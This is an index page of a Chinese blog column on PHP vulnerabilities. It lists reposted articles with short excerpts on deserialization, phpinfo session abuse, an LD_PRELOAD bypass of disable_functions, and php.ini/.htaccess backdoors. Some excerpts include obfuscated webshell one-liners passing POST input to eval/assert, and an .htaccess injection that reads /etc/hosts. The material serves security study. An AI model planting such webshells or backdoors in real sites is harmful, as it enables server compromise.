PHP---漏洞
bylfsj
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
4.1.9. 其它
4.1.9. 其它¶4.1.9.1. 低精度¶php中并不是用高精度来存储浮点数,而是用使用 IEEE 754 双精度格式,造成在涉及到浮点数比较的时候可能会出现预期之外的错误。比如 php -r "var_dump(0.2+0.7==0.9);" 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。4.1.9.2. 弱类型¶如果使...转载 2019-10-31 21:29:35 · 551 阅读 · 0 评论 -
WebShell变形
4.1.7. WebShell¶4.1.7.1. 常见变形¶GLOBALSeval($GLOBALS['_POST']['op']);$_FILEeval($_FILE['name']);拆分assert(${"_PO"."ST"} ['sz']);动态函数执行$k="ass"."ert"; $k(${"_PO"."ST"} ['sz...转载 2019-10-31 21:18:25 · 645 阅读 · 0 评论 -
PHP htaccess注入备忘单
情境在Apache / mod_php的安装程序中,攻击者能够注入.htaccess(或php.ini或apache配置)。注入目录中设置了AllowOverride Options(或AllowOverride All,这也是很常见的)。例子示例1a:文件包含index.php :(空).htaccess:php_value auto_append_file /etc/hosts...转载 2019-10-31 21:15:04 · 666 阅读 · 0 评论 -
phpinfo相关漏洞
4.1.5. phpinfo相关漏洞¶4.1.5.1. Session.Save¶PHP的Session默认handler为文件,存储在 php.ini 的 session.save_path 中,若有任意读写文件的权限,则可修改或读取session。从phpinfo中可获得session位置4.1.5.2. Session.Upload¶php.ini默认开启了 session...转载 2019-10-31 21:09:43 · 1465 阅读 · 0 评论 -
无需sendmail:巧用LD_PRELOAD突破disable_functions
*本文原创作者:yangyangwithgnu,本文属FreeBuf原创奖励计划,未经许可禁止转载摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破!半月前逛“已黑网...转载 2019-10-31 21:01:18 · 417 阅读 · 0 评论 -
PHP反序列化漏洞
又到了金三银四跳槽季,很多小伙伴都开始为面试做准备,今天小编就给大家分享一个网安常见的面试问题:PHP反序列化漏洞。虽然PHP反序列化漏洞利用的条件比较苛刻,但是一旦被利用就会产生很严重的后果,所以很多公司都比较关注这个技能点,小伙伴们一定要掌握哦。PHP序列化与反序列化介绍什么是序列化与反序列化维基百科中这样定义:序列化(seri...转载 2019-09-27 18:54:55 · 441 阅读 · 0 评论 -
后门---php.ini/.htaccess/.user.ini-------------------利用 auto_prepend_file 和 include_path
From:http://www.cnblogs.com/iamstudy/articles/php_ini_backdoor.html原理php.ini中有这几种模式:PHP_INI_*模式的定义文件配置属性官方解释auto_prepend_file 意味这是在php脚本执行前会执行这个参数设置的脚本,然后这个参数的脚本所在目录...转载 2019-10-31 20:03:45 · 957 阅读 · 0 评论
分享